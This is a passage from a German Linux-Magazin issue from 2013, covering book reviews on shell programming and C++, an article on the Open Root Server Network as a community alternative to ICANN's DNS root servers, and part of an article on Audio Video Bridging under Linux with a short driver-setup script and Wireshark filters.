‐Eilverfahren‐zurueck‐zu‐MS‐Office]
[17] Open Forum beklagt Ausschreibungsfehler:
[https:// joinup. ec. europa. eu/ news/
openforum‐europe‐procurement‐law‐fails
‐address‐discriminatory‐practices]
[18] Ausschreibungsfehler der EU:
[http:// www. computerweekly.​
com/ blogs/ public‐sector/ 2012/ 07/​
-the‐european‐commission‐has. html]
[19] Ubuntu der Gendarmerie:
[http:// en. wikipedia. org/ wiki/ GendBuntu]
[20] Gendarmerie spart mit Open Source:
[http:// joinup. ec. europa. eu/ news/ fr
‐gendarmerie‐saves‐millions‐open
‐desktop‐and‐web‐applications]
[21] GNU/​Linex:
[http:// en. wikipedia. org/ wiki/ GnuLinEx]
[22] Extremadura: [http:// joinup. ec. europa. eu/​
community/ osor/ news/ spains
‐extremadura‐starts‐switch‐40000
‐government‐pcs‐open‐source]
[23] Interview mit Extremadura-CEO Theodomir
Cayetano: [http:// joinup. ec. europa.​
eu/ news/ extremadura‐move‐all‐its‐40000
‐desktops‐open‐source]
[24] Limux: [http:// www. muenchen. de/ limux]
[25] Wollmux: [http:// www. wollmux. net]
[26] Markus Feilner, „Ein idealer Sündenbock“:
Linux-Magazin 09/​11, S. 38
Open Source in Europa 11/2013
Forum
www.linux-magazin.de
81

Forum
www.linux-magazin.de Bücher 11/2013
82
Bücher über Shellprogrammierung sowie über C++
Tux liest
Das Linux-Magazin hat sich diesmal zwei dicke Bände vorgenommen: Der erste ist deutschsprachig und
beschäftigt sich mit Shellprogrammierung, der zweite ist in Englisch verfasst und stellt die Sprache C++
aus dem Blickwinkel ihres Erfinders Bjarne Stroustrup dar. Bernhard Bablok, Rainer Grimm
Auf dem Buch „Shellprogrammierung“
(vierte, überarbeitete Auflage) prangt als
Untertitel „Das umfassende Handbuch“.
Mit 800 Seiten übertrifft es aber die übliche
Handbuchgröße deutlich. Im Grunde
unnötig, denn es enthält viele Kapitel, die
mit Shellprogrammierung gar nichts zu
tun haben: Wichtige Linux-Kommandos
sind mit dem Thema ja noch verwandt,
aber die Kapitel über HTML, CGI-Programmierung
und Gnuplot scheinen doch
mehr der Pflicht geschuldet zu sein, das
Buch vollzukriegen.
Shell und mehr
Die enthaltenen Linux-Kommandos zeigen,
dass das Buch sich aber nicht nur als
Handbuch für die Shellprogrammierung
versteht, sondern eher als Handbuch für
den Alltag des Sysadmin gedacht ist – zu
dem auch die Shellprogrammierung gehört.
Für die Zielgruppe der angehenden
Admins ist das Buch also durchaus zu
empfehlen. Wer sich aber mit Linux/​Unix
auskennt und gezielt ein Buch über die
Shellprogrammierung sucht, ist nicht so
gut bedient.
Das umso mehr, als das Buch hier eben
nicht „umfassend“ angelegt ist. Die Autoren
behandeln zwar neben der Bash
auch andere wichtige Shells (wie »sh«
oder »ksh«) und gehen – wenn nötig –
Info
Jürgen Wolf, Stefan
Kania:
Shell-Programmierung
Galileo Computing, 2013
800 Seiten
40 Euro (Online-Ausgabe
35 Euro)
ISBN 978-3-8362-2310-2
auf Unterschiede ein, aber die Neuerungen
der Bash 4 erwähnen sie überhaupt
nicht. Das ist ein schweres Manko, denn
die aktuelle Version der Bash ist mehr als
vier Jahre alt und inzwischen Standard
auf den meisten Systemen.
Darüber hinaus leistet sich dieser Band
eine Reihe schwerer Patzer rund um das
Quoting, etwa bei der Erklärung des Unterschieds
zwischen »$*« und »$@«. Das
wird Anfängern nicht auffallen, aber gerade
das Quoting muss einfach stimmen,
sonst wird der angehende Programmierer
jahrelang mit Fehlern in seinen Skripten
kämpfen.
Diese Mängel sind bedauerlich, denn das
Buch ist didaktisch gut aufgebaut, schön
gedruckt und die Mischung aus Theorie
und Praxis ist ansprechend. Störend wirkt
nur eine Reihe völlig unnötiger Anglizismen,
in den Kapitelüberschriften etwa
„Bash und Kornshell only“. Hier hätte das
Lektorat eingreifen müssen.
C++-Bibel aktualisiert
Mit gut 1300 Seiten zählt „The C++
Programming Language“ von Bjarne
Stroustrup in der vierten Auflage ebenso
viele Seiten wie der aktuelle C++-Standard,
der Grundlage des Buches ist. Alleine
60 Seiten widmet der Erfinder von
C++ dem Index.
Das Buch genießt seit seiner ersten Auflage
einen legendären Ruf. Gilt es doch
einerseits als die C++-Bibel, andererseits
als ein Buch, das den Einsteiger aufgrund
seines Umfangs und seiner Akribie zu
erschlagen droht. Diesem Ruf wird auch
die aktuelle Auflage gerecht.
Es besteht aus vier Themenblöcken, die
in mehrere Kapitel aufgeteilt sind. Bevor
Bjarne Stroustrup auf gut 300 Seiten die
Grundlagen der Programmiersprache darlegt,
gibt er eine Einführung in C++ im
Allgemeinen und in sein eigenes Werk im
Besonderen. Dabei versteht er unter den
Grundlagen von C++ den C-Kern. Auf
die Grundlagen in C folgen die Abstraktionen
in C++. So beschäftigt Stroustrup
sich im zweiten Drittel des Werkes mit
objektorientierter und generischer Programmierung.
Den Abschluss bildet die Standardbibliothek.
Das umfasst die Standard Template
Library, die I/​O-Streams, die neuen
Bibliotheken für reguläre Ausdrücke
und Smart Pointer, aber auch die neue
Multithreading-Funktionalität von C++.
Der Autor stellt nicht nur C++ mit vielen
Codebeispielen und großer Liebe zum
Detail vor, er belegt die Theorie auch mit
Verweisen zum C++-Standard, setzt sie in
mehreren Beispielen zu String-, Datumund
Vektorklassen um und beendet jedes
Kapitel mit einigen Ratschlägen.
Neben der vielen Theorie und Praxis
zieht sich aber ein Aspekt wie ein roter
Faden durch das ganze Werk und
hat ihm den Ruf einer Bibel eingebracht:
Bjarne Stroustrups Vorstellung von gutem
C++-Stil, den er immer und immer wieder
vermittelt. Ein großartiges Buch, das
enormes Detailwissen mit der Vorstellung
von gutem C++-Stil auf einzigartige
Weise verbindet. (mhu)
n
Info
Bjarne Stroustrup:
The C++ Programming
Language
Addison-Wesley, 2013
1370 Seiten
50 Euro
ISBN: 978-0-3215-6384-2

Know-how
www.linux-magazin.de ORSN 11/2013
84
Das Open Root Server Network will ein Gegengewicht zur ICANN schaffen
Auferstanden
In der Zeitung „The Guardian“ fordert Bruce Schneier die Community dazu auf, das Internet aus den Klauen
der Geheimdienste zu befreien und wieder selbst die Führung zu übernehmen. Dabei helfen könnte ein Projekt,
das schon abgehakt war und beerdigt schien: das Open Root Server Network. Martin Loschwitz
© Hirlesteanu Constantin Ciprian, 123RF.com
Wer sich im Internet bisher heimisch
und vielleicht sogar frei fühlte, erlebt derzeit
herbe Enttäuschungen: Täglich enthüllen
Zeitungen neue Details darüber,
wie Geheimdienste das Netz der Netze
rund um den Globus auf verschiedenste
Arten zum übergroßen Überwachungswerkzeug
umfunktioniert haben.
Back to Power
Die Kontrolle zurückgewinnen, das sei
das Ziel, meint nicht nur Bruce Schneier
(Abbildung 1), der sich als Security-Guru
einen Namen gemacht hat, in seinem
Artikel im Guardian [1]. Seine simple
Logik: Was Techniker einst erfunden haben,
ist inzwischen von Anwälten und
der Politik für üble Zwecke missbraucht
worden und nur die Techniker, die an
der Entwicklung des Internets beteiligt
waren, können es nun wieder in den
Sollzustand versetzen.
Schneier meint offensichtlich jene Community,
die maßgeblich aus technischem
Interesse handelt, und fordert diese auf,
neue Technologien zu entwerfen, die das
Ausspähen von Internetnutzern schwieriger
als bisher und idealerweise unmöglich
machen.
Seinem Aufruf lässt sich leicht beipflichten,
doch schwieriger wird es, wenn
konkrete Lösungsansätze gefragt sind.
Das Open Root Server Network (ORSN,
[2]) geht die Sache praktisch an und liefert
einen Vorschlag, um zumindest den
Missbrauch des DNS-Systems für Überwachungszwecke
zu verhindern.
DNS-Basics
Um zu verstehen, wie ORSN funktioniert,
hilft es, sich zunächst die Funktionsweise
des DNS-Systems insgesamt vor Augen
zu führen. Erklärungen für Internet-
Einsteiger enthalten häufig die Analogie,
DNS sei das Telefonbuch des Internets,
denn es übersetzt Namen wie [www.
google.de] in numerische IP-Adressen,
mit denen sich die Clientprogramme –
also zum Beispiel ein Browser – im Anschluss
verbinden.
In Wahrheit ist das DNS-System fein ziseliert:
Der Benutzer hat auf seinem System
üblicherweise einen Nameserver in
die Konfiguration eingetragen, den die
Komponenten auf dem System nutzen.
In der Regel sind es die Provider, die
diesen Nameserver betreiben. Die Provider-Nameserver
wiederum benötigen
selbst eine Datenquelle, aus der sie ihre
Informationen beziehen, um sie an die
Clients weiterzuleiten.
Rootserver
Hier kommen die DNS-Rootserver ins
Spiel: Sie verwalten die meisten Toplevel-
Domains und wissen, auf welchen Nameservern
sich Daten zu spezifischen Domains
finden lassen. Will ein Client also
[www.​google.​de] aufrufen, dann verbindet
sich der genutzte Nameserver mit den
DNS-Rootservern, schaut nach, wo DNS-
Informationen für die Toplevel-Domain
».de« zu finden sind, redet im Anschluss
mit den Nameservern der Denic-Server
und erhält von diesen schließlich die Information,
dass DNS-Einträge für diese
Domain auf den Google-Nameservern zu
finden sind.
Jeder Name, den ein User in einem Clientprogramm
aufruft, geht also letztlich auf
einen Eintrag in den Zonendateien der
DNS-Rootserver zurück – DNS-Caching
sei in diesem einfachen Beispiel mal außen
vor gelassen. Was so simpel klingt,
ist von zentraler Bedeutung für das Funktionieren
des Internets: Ohne DNS ginge
fast nichts mehr.
Trotzdem haben die mindestens 1,5 Milliarden
Internetnutzer de facto kaum eine
Kontrolle darüber, was in den Rootzonen

Quelle: O’Reilly
Abbildung 1: Der Sicherheitsexperte Bruce Schneier
fordert das Internet aus den Klauen der Geheimdienste
zu befreien. Einen ersten Ansatz dazu
könnte ORSN liefern.
denn nun eigentlich zu finden ist. Nominell
befinden sich die Systeme unter der
Kontrolle der ICANN (Internet Corporation
for Assigned Names and Numbers),
betrieben werden sie aber in der Regel
von kommerziell orientierten Unternehmen,
von denen nicht wenige in den USA
beheimatet sind.
Damit ist es durchaus denkbar, dass sich
über das DNS-System eine umfassende
Kontrolle etablieren lässt, die sogar so
weit gehen kann, auf Grundlage des
DNS-Protokolls den Traffic eines Nutzers
über bestimmte Wege im Netz zu führen.
SSL hilft hier auch nicht: Einerseits ist es
im Fall des Falles für Lauscher kaum ein
Problem, ein SSL-Zertifikat zu erhalten,
das zu einem bestimmten Namen passt.
Und andererseits muss die SSL-PKI spätestens
seit Edward Snowden ebenfalls
als tendenziell unsicher gelten.
Open Root Servers Network
ORSN hat das Ziel, ein alternatives Netzwerk
von DNS-Rootservern zu den offiziellen
zu etablieren, um Provider-gesteuerten
Missbrauch zu verhindern. Die Idee
ist simpel: Anstelle der ICANN-Server tragen
Admins von Nameservern die ORSN-
Rootserver in ihre Konfiguration ein, sodass
die Abfrage von Toplevel-Domains
über die ORSN-Server geschieht.
Zunächst ändert das an der zugrunde liegenden
Technik nichts, ebenso ist es das
erklärte Ziel der ORSN-Betreiber, zu 100
Prozent mit den Einträgen der ICANN-
Rootserver kompatibel zu bleiben. Eigene
Toplevel-Domains will das ORSN keinesfalls
etablieren.
Doch wozu dann der Aufwand? Was
rechtfertigt den Aufbau eines solchen
Nameserver-Systems, wenn letztlich der
Dienst das Gleiche tut wie das bereits
vorhandene System? Das Zauberwort
lautet Kontrolle: Das ORSN versteht sich
als Community-Projekt und ist von sachfremden
Interessen weitestgehend unabhängig,
sodass die Kontrolle über die Inhalte
der DNS-Rootzonen der Community
obliegt. Letztlich realisiert ORSN also
genau das, was Bruce Schneier fordert,
schon mal für das DNS.
Auferstanden
Interessanterweise ist das ORSN keinesfalls
eine neue Erfindung. Von 2002 bis
2008 gab es das Projekt schon einmal,
auch wenn die Vorzeichen für seine Einführung
damals andere waren. Denn anders
als heute waren die DNS-Rootserver
2002 längst nicht so global aufgestellt
– die meisten Server waren in den USA
beheimatet, was insbesondere bei der
Community in Europa zu einigem Unwohlsein
führte.
Mit einem transparenten System, das
global besser verteilt sein sollte, wollten
sich die ORSN-Gründer damals diesem
Ungleichgewicht widersetzen. Seither hat
sich sehr viel getan: Die ICANN erkannte,
dass die DNS-Zentrierung auf Amerika
ein Problem sein könnte, ideologischer
wie technischer Natur. Man fächerte das
DNS-System auf und installierte Nameserver
auch in anderen Ländern.
Zudem baute das ICANN eine Struktur
auf, bei der Nameserver global ihre Inhalte
auf andere Systeme spiegeln und
die IP des Rootservers den Routern zugänglich
machen. Fiel ein Nameserver
aus, gab es also einen anderen, der mit
demselben Datensatz den Dienst wieder
anbieten konnte.
Von Überwachung war bei ORSN damals
allerdings noch keine Rede, und so stellte
das Projekt 2008 nach einer langen Rollout-Phase
den Betrieb ein. Die Erfinder
glaubten, ihr Ziel erreicht zu haben. An-

Know-how
www.linux-magazin.de ORSN 11/2013
86
Abbildung 2: Darstellung der öffentlichen TLD ».com« beim DNS-Query über die
normalen Rootserver …
Abbildung 3: … und über die ORSN-Rootserver. Der Output ist identisch, doch
die ORSN-Server stehen unter der Kontrolle der Community.
gesichts der immer umfassenderen Enthüllungen
von Edward Snowden über die
Aktivitäten der Geheimdienste entschlossen
sich aber Anfang Juli 2013 die Gründer
von ORSN, das Projekt wiederzubeleben
– diesmal unter der Prämisse, ein
Community-basiertes System zu bauen,
das sich auch aus der Community heraus
kontrollieren lässt.
Abgeschlossen 2008,
reanimiert 2013
Das Open Root Servers Network hatte
sich zumindest eingangs tatsächlich auf
den Betrieb von DNS-Servern für die
TLDs beschränkt. Das führte zu einem
großen Problem: Damit Endanwender in
den Genuss des Community-DNS kommen,
benötigen sie selbst einen Nameserver,
der das ORSN nutzt.
Wer in seiner Systemkonfiguration beispielsweise
die Google-Nameserver zum
Einsatz bringt, weil deren IP-Adressen so
leicht zu behalten sind, hat keine Chance
auf den Service, liefert aber durch seine
DNS-Abfragen der Datenkrake Google
direkte Hinweise auf sein Verhalten im
Netz, schlimmstenfalls auch über das
seiner Anwender. Und dass sich jeder
Anwender einen eigenen Nameserver
installiert, erscheint letztlich unrealistisch.
Aus genau diesem Grund bietet
das ORSN mittlerweile auch Zugang zu
einigen öffentlichen DNS-Servern an,
die Endanwender anstelle der vom Provider
angebotenen DNS-Server nutzen
können.
Die Abbildungen 2 und 3 zeigen: Ein Unterschied
lässt sich nicht ausmachen, und
das ist auch genau so gewollt. Unter [3]
steht die aktuelle Liste der verfügbaren
öffentlichen DNS-Server, und demnächst
will ORSN hier noch aufstocken.
Der Anfang ist gemacht,
Mitmachen erwünscht
Mitte September standen dem ORSN insgesamt
acht Server zur Verfügung, die
alle in Europa beheimatet sind – fünf
in Deutschland sowie jeweils einer in
Griechenland, in der Schweiz und in den
Niederlanden. Wer einen Server zur Verfügung
stellen möchte, den lädt ORSN
zur Teilnahme ein. Genaue Informationen
zu den Anforderungen finden sich
auf der Website [2].
ORSN löst sicher nicht alle Probleme im
Hinblick auf die Vorherrschaft im Netz,
aber es ist ein erster Ansatz, um die von
Bruce Schneier geforderte Rückeroberung
des Internets in Angriff zu nehmen.
Schon allein dafür verdienen die Macher
hinter ORSN Anerkennung und Unterstützung.
Bleibt nur zu hoffen, dass sich
viele Admins beteiligen. (mfe) n
Infos
[1] Schneier im Guardian: [http:// www. thegu -
ar dian. com/ commentisfree/ 2013/ sep/ 05/
government‐betrayed‐internet‐nsa‐spying]
[2] Mitmachen bei ORSN:
[http:// www. orsn. org/ de/ join/]
[3] Öffentliche ORSN-Nameserver:
[http:// www. orsn. org/ de/ tech/ pubdns/]
Der Autor
Martin Gerhard Loschwitz
arbeitet als Principal Consultant
bei Hastexo. Er
beschäftigt sich dort intensiv
mit den Themen Hochverfügbarkeit
und Cloud
Computing und pflegt in seiner Freizeit den Linux-
Cluster-Stack für Debian GNU/​Linux.

Know-how
www.linux-magazin.de AVB 11/2013
88
Audio Video Bridging unter Linux
Multimedia-Brücke
Audio Video Bridging (AVB) überträgt Multimediadaten in Echtzeit durchs modernisierte Ethernet. Ein Überblick
über Protokolle, geeignete Hardware und Linux-Unterstützung. Christoph Kuhr
© Muharrem Zengin, 123RF
schließend einen neuen AVB-Stream mit
einem gemischten Audiosignal zu den
Lautsprechern zu schicken. Daneben
zeichnet ein PC mit Aufnahmesoftware
den AVB-Stream des Mikrofonvorverstärkers
auf. Außerhalb des eigentlichen
AVB-Netzwerks befindet sich ein Laptop,
der über keine AVB-Hardware verfügt. Er
steuert jedoch die AVB-Teilnehmer mit
Hilfe des Protokolls IEEE 1722.1.
AVB-Protokolle
Audio Video Bridging (AVB) heißt eine
neue Funktion für Ethernet-Netzwerke.
Sie bietet präzise Synchronisation aller
Teilnehmer sowie Quality of Service auf
der Netzwerkschicht 2. Damit schafft sie
die Voraussetzung dafür, digitales Audio
und Video in Echtzeit durchs Netzwerk
zu schicken.
Alles per Ethernet
Für AVB gibt es ein Reihe von Anwendungsbereichen.
Sie lassen sich bereits
erraten, wenn man sich die Mitgliederliste
der Avnu Alliance [1] ansieht, die
sich um die Zertifizierung von AVB-Geräten
und die Etablierung der Standards
kümmert. Neben Chipherstellern wie
Intel und Broadcom findet sich hier mit
der Harman-Gruppe, Yamaha und Meyer
Sound die professionelle Audio- und
Video-Branche. Mit EADS ist zudem die
Luftfahrt- und Rüstungsindustrie mit von
der Partie. Für die Autoindustrie gibt es
sogar ein eigenes Whitepaper zur neuen
Netzwerktechnologie [2]. Hier soll AVB
nicht nur für das In-Vehicle-Infotainment
zum Einsatz kommen, sondern auch
Busse wie CAN ersetzen. AVB benötigt
weniger Kabelstrecke und trägt der hochgradigen
Dezentralisierung der Systeme
im Fahrzeug Rechnung.
Die Ethernet-Erweiterungen sind im
Grunde interessant für alle, die Audio
und Video übertragen möchten. Dazu
gehören Konferenzzentren und Hotels sowie
die Veranstaltungstechnik allgemein
mit ihren zahlreichen Mikrofonen, Lautsprechern
und Mischpulten, Kameras
und Bildschirmen. Selbst Privatleute mit
Heimkino und Stereoanlage sollen künftig
alle ihre Geräte mit dem Ethernet-Stecker
verbinden und Abschied von HDMI, DVI,
Miniklinke und Cinch nehmen.
Abbildung 1 zeigt ein kleines AVB-Netzwerk
für die Beschallung einer Veranstaltung.
Es streamt die Mikrofonsignale von
der Bühne mit den Musikern über AVB.
Das Mischpult empfängt und verarbeitet
die Signale aus diesem Stream, um an-
Definiert ist AVB in Standards der Reihe
802 des Institute of Electrical and Electronics
Engineers (IEEE). Die meisten der
Spezifikationen sind nach Registrierung
kostenlos herunterzuladen.
Um sicherzustellen, dass alle Audiosamples
und Videoframes zur richtigen
Zeit wiedergegeben werden, benötigt
AVB einen Synchronisationsmechanismus.
Sonst könnten beispielsweise zwei
Lautsprecher, die Audiosamples zu leicht
unterschiedlichen Zeiten geliefert bekommen,
unerwünschte gegenseitige Auslöschungen
hervorrufen.
Zur Abstimmung dient das Precision
Time Protocol (PTP), definiert in IEEE
802.1AS [3], das alle Clocks innerhalb
einer Domäne synchronisiert. Die Clocks
sind hierarchisch als Baum aufgebaut:
Ein Grand Master generiert die beste lokale
Clock und taktet die AS-Domäne.
Den Grand Master ermittelt der Best-
Master-Clock-Algorithmus (BMCA). Die
Buchstaben S und M an den Switchports
in Abbildung 1 zeigen die hierarchische
Struktur: M steht für Master-, S für Slaveport
(X bindet den Laptop an).
Da es einen undefinierten Zeitraum dauert,
bis ein Paket die unterste Schicht
eines Protokollstapels erreicht hat, misst
jeder PTP-Teilnehmer den Zeitraum der

Bearbeitung vom Senden bis kurz vor
der Bitübertragungsschicht und kommuniziert
diesen. Zusätzlich messen auch
die PTP-Instanzen der AVB-Switches Zeitverzögerungen
im Netzwerk.
Um Unterbrechungsfreiheit zu gewährleisten,
fordern Talker und Listener Netzwerkressourcen
per Stream Reservation
Protocol (SRP) bei den AVB-Switches an
(IEEE 802.1Q-2011 Paragraph 35, [4]).
Die genauen Methoden beschreibt Kapitel
10 des Standards IEEE 802.1ak als
Multiple Registration Protocol (MRP,
[5]). Die wichtigsten Nachrichten sind
»TalkerAdvertise« und »ListenerReady«.
Streams reservieren
Laptop ohne AVB-Karte
AVDECC-Controller
Mikrofonvorverstärker S
mit AVB-Karte
X
AVDECC Talker
M
AVB-Switch
S
AVDECC
IEEE-1722-Stream
Listener
PC mit AVB-Karte
Multichannel Recording
IEEE-1722-Stream
M
AVB-Switch
M S
S
AS-Domäne
M
M
S
Aktiver Lautsprecher
mit AVB-Karte
AVDECC
Listner
IEEE-1722-Stream
AVDECC Listener Talker
Mischpult mit AVB-Karte
AVB 11/2013
Know-how
www.linux-magazin.de
89
Der wesentliche Faktor für die unterbrechungsfreie
Übertragung ist ein gleichmäßig
geformter Datenstrom. Einerseits soll
AVB zeitkritische Frames gegenüber unkritischen
bevorzugen, andererseits soll
es ein Überlaufen der Switchport-Puffer
durch Bursts vermeiden.
Ein via SRP registrierter Stream wird bevorzugt
weitergeleitet, sodass im Falle
knapper Bandbreite der nicht registrierte
Datenverkehr warten muss. Ein kreditbasiertes
Warteverfahren, eine Art Leaky-
Bucket-Algorithmus, vermeidet Zeitüberschreitungen
nicht registrierten Verkehrs.
Näheres dazu findet sich in IEEE 802.1Q-
2011, Paragraph 34 [6].
Der Standard IEEE 1722 [7] umfasst zwei
Protokolle: Das MAC Address Acquisition
Protocol (MAAP) für die Reservierung
von Multicast-MAC-Adressbereichen
und das Audio Video Transport Protocol
(AVTP) für den Transport der Nutzdaten.
Das MAAP beschreibt Funktionen,
die notwendig sind, um mehrere MAC-
Adressen für eine Schicht-2-Multicast-
Übertragung zu registrieren.
AVTP spezifiziert das Rahmenformat des
Audio- und Videodatenstroms, in ihm
werden Pakete nach den Standards IEC
61883-2, 4, 6, 7, 8 verpackt [8]. Diese
IEC-Standards dienen auch zur Übertragung
über Firewire (IEEE 1394). Videodaten
lassen sich im Mpeg-2/​TS-Format verschicken,
Audiodaten mit nicht-linearen
Audioformaten wie AC3 oder mit dem
linearen PCM-Codec mit bis zu 196 Bit
Genauigkeit.
Bei Steuerung und Synchronisation setzt
AVB auf etablierte Protokolle wie MIDI
Abbildung 1: Ein kleines AVB-Netzwerk für eine Beschallungssituation mit Mikrofon, Mischpult, Aktivlautsprecher,
zwei AVB-Switches und Aufzeichnungsgerät.
und SMPTE-Timecode. Die Presentation
Time ist ein 32-Bit-Timestamp, berechnet
aus dem Zeitpunkt, zu dem der AVTP-
Rahmen den Talker verlassen hat (Bitsicherungsschicht),
akkumuliert mit der
Worst-Case-Latenz der Übertragungsstrecke
zum Listener. Sie nennt den genauen
Zeitpunkt, zu dem der Rahmen den Listener
spätestens erreichen darf.
Eine 64-Bit-Stream-ID stellt den einzigartigen
Erkennungswert des Streams dar.
Diese Stream-ID ist die Grundlage für
jeden Transportstrom, um mit SRP Netzwerkressourcen
zu reservieren und bei
der Weiterleitung zeitkritischer Ethernet-
Rahmen berücksichtigt zu werden.
Management
Im Standard IEEE 1722.1 „Audio/​Video
Discovery, Enumeration, Configuration
and Control“ (AVDECC, [9]) sind mehrere
Protokolle und Funktionen zusammengefasst.
Er befindet sich noch im
Entwurfsstadium, der aktuelle Stand ist
D23v2. Speziell bei diesem Standard hat
es lange gedauert, bis sich alle Parteien
des Gremiums einigen konnten, nun steht
er kurz vor der Ratifizierung.
Jedes zum IEEE 1722.1 konforme Endgerät
besitzt ein AVDECC Entity Model
(AEM), das unterschiedliche Konfigurationen
speichern kann. Die enthaltenen
Informationen sind für die drei Protokolle
AVDECC Connection Management Protocol
(ACMP), AVDECC Enumeration and
Control Protocol (AECP) und AVDECC
Discovery Protocol (ADP) erforderlich.
Mit ADP können sich Endgeräte in der
AVB-Domäne an- und abmelden sowie
nach anderen Endgeräten suchen. Verschiedene
Steuerfunktionen der Endgeräte
lassen sich per AECP realisieren, beispielsweise
Konfigurationen umschalten,
die Firmware aktualisieren oder Parameter
in Echtzeit steuern.
ACMP steuert den Auf- und Abbau der
Verbindung zwischen Talker und Listener.
Die Bandbreite für den Stream wird
mit SRP reserviert. Der Talker sichert
sich mit Hilfe des MAAP alle benötigten
MAC-Adressen (Listener, Switchports der
Route). Es gibt zwei Modi beim Verbindungsaufbau.
Entweder bauen mehrere
Endgeräte im Fast-Connect-Modus eine
automatische Verbindung mit ihren gespeicherten
Informationen auf oder ein
AVDECC-Controller steuert die Verbindung
im Controller-Connect-Modus.
Hardware
Die AVB-Protokolle der Netzwerkschicht
2 benötigen zwingend Hardware-Unterstützung.
Auf dem Markt gibt es bereits
Systeme, die AVB unterstützen, obwohl
noch nicht alle Standards abgeschlossen
sind. Die Firma Riedel [10] hat schon ein
paar Geräte in ihrem Portfolio, die Firma
Audinate [11] beschreibt ihre Dante-Produkte
als „AVB Ready“. Zudem gibt es
Komplettlösungen von Uman [12]. Auch

Know-how
www.linux-magazin.de AVB 11/2013
90
01 #!/bin/bash
02
03 rmmod igb
04 rmmod igb_avb
05 insmod ./igb_avb.ko
06 sleep 1
07 ifconfig eth1 down
andere Mitglieder der Avnu haben AVB-
Produkte im Angebot.
Der britische Prozessorhersteller Xmos
[13] bietet mit seinen Entwickler-Boards
Xcore eine günstige Lösung für kleine
AVB-Anwendungen und benutzt dabei
einen Open-Source-Stack. Auch die Firma
Uman unterstützt die Xcore-Plattform.
Lab X [14] bietet ebenfalls AVB-Software-
Lizenzen für Xilinx und Marvell, sowie
neuerdings auch für Altera, die jedoch für
Endnutzer unerschwinglich sind.
Aus Hongkong kommt vom Hersteller
DSP4You [15] ein erschwinglicher 5-Port-
AVB-Switch für rund 100 US-Dollar, der
auf dem Chipset 88E7251 von Marvell
basiert. Ihm fehlt ein Webinterface für etwaige
Einstellungen, er lässt sich aber als
AVB-Endgerät für eigene Entwicklungen
einsetzen. Die Firma Lab X hat einen kleinen
5-Port-AVB-Switch namens Titanium
411 für 800 Dollar im Angebot, Features
wie Port Mirroring fehlen aber.
Der Hersteller Netgear [16] bietet zusammen
mit dem Pro-Audio-Hersteller BSS
den 24-Port-AVB-Switch GS724T an, sein
08 echo 0 > /sys/class/net/eth1 /queues/tx‐0/xps_cpus
09 echo 0 > /sys/class/net/eth1/queues/tx‐1/xps_cpus
10 echo f > /sys/class/net/eth1/queues/tx‐2/xps_cpus
11 echo f > /sys/class/net/eth1/queues/tx‐3/xps_cpus
12 ifconfig eth1 up
Abbildung 2: Intel vermarktet die Netzwerkkarten seiner Serie I210 unter
dem Schlagwort AVB.
Listing 1: Linux-AVB aktivieren
Preis lag zur Markteinführung
bei 1800 Euro.
Für Rechenzentren
liefert Extreme Networks
[17] skalierbare
AVB-Lösungen. Marvell
vermarktet seine
Netzwerkkarte Yukon
Optima 88E8059 mit
AVB-Support [18]. Die
Dokumentation gibt es
jedoch erst bei einer
Abnahme von mehr
als 100 000 Stück und
der aktuelle Treiber
Sky2 bietet keine AVB-
Funktionen.
Anders ist das bei einer im Frühjahr 2013
erschienenen Produktreihe von Intel, die
bei Händlern wie Reichelt und Amazon
rund 70 Euro kostet. Die Serie I 210 bietet
kompletten AVB-Hardware-Support,
das dafür erforderliche IGB-Modul ist seit
Version 3.4.0 im Linux-Kernel integriert
(Abbildung 2).
Open AVB
Für AVB-Treiber und weitere Software
sorgt das Open-Source-Projekt Open AVB,
das Intel ins Leben gerufen hat [19]. Der
Code für den Kernel steht unter GPLv2,
weitere Komponenten unter BSD-Lizenz.
Der aktuelle Zweig ist »open‐avb‐next«.
Das Projekt umfasst ein IGB-AVB-Kernelmodul,
einen GPTP-Daemon (eine von
mehreren Linux-Implementierungen des
PTP-Protokolls), einen MRP-Daemon sowie
Beispielanwendungen für Talker und
Listener.
Im Unterschied zum Standard-IGB-Modul
von Linux verfügt das AVB-Modul über
zwei spezielle Queues für AVB-Streams.
Sie kommen bei der Priorisierung des
Ethernet-Verkehrs zum Einsatz. Das AVB-
Modul kompiliert der Anwender mit PTP-
Clock-Unterstützung, anschließend lädt
er das Modul und lenkt die Standard-
LAN-Queues des Userspace mit dem
Shellskript in Listing 1 um.
Der Autor hat den Open-AVB-Stack auf
Linux Mint 14 (AMD 64) mit der Kernelversion
3.9.0-rc8-generic getestet. Als
Netzwerkkarte diente eine Intel I 210.
Über einen Lab-X-Titanium 411 oder einen
DSP4U-AVB-Switch war der Rechner
mit zwei Xmos-AVB-Entwicklungsboards
verbunden. Auf den Boards hatte er je
eine Listener- und eine Talker- Instanz
konfiguriert, die als Gegenstellen für die
Tests dienten.
Kinderkrankheiten
Der GPTP-Daemon synchronisiert sich
nach seinem Start erwartungsgemäß mit
der verbundenen 802.1AS-Domäne. Mit
einem Titanium-AVB-Switch von Lab X
kann es jedoch vorkommen, dass folgende
Fehlermeldung erscheint:
Error (TX) timestamping Sync, error=‐72
Der Switch verliert dabei seine PTP-Synchronität
und alle Streams reißen ab. Der
Fehler liegt in der Firmware des Titanium,
der Hersteller arbeitet derzeit an Abhilfe.
Eine Alternative ist der Switch von DSP-
4You. Dieser verursacht jedoch bislang
unerklärte Inter Packet Gaps (IPG) von
900 Mikrosekunden statt der geforderten
125 Mikrosekunden.
Der MRP-Daemon hingegen funktionierte
im Test des Autors einwandfrei. Eingehende
»TalkerAdvertise«-Nachrichten bestätigt
er mit »ListenerReady«-Messages,
als Antwort auf »TalkerAdvertise« kommt
»ListenerReady«. Die »ListenerReady«-
Nachricht setzt dabei die Beispielanwendung
»simple_listener« aus dem Open-
AVB-Quelltext ab (Abbildung 3). Dieses
kleine Programm verbindet sich mit
einem Talker und erzeugt nach erfolgreichem
Verbindungsaufbau eine Wav-
Datei. Die Nachricht »TalkerAdvertise«
verschickt das Beispielprogramm »simple_talker«.
Es erzeugt eine synthetische
Sinusschwingung von 480 Hz.
Der Verbindungsaufbau war nach dem
Anpassen einiger Parameter im Xmos-
Quellcode möglich, doch es ließen sich
keine Audiosamples empfangen oder
versenden. Der Grund hierfür ist die
noch unvollständige Implementierung
des Open-AVB Stacks: Es gibt noch keine
Tabelle 1: Wireshark-Filter für AVB
Protokoll
PTP
MSRP
MVRP
MMRP
IEEE 1722
AVDECC 1722.1
Filterausdruck
ptp
mrp-msrp
mrp-mvrp
mrp-mmrp
ieee1722
ieee1722

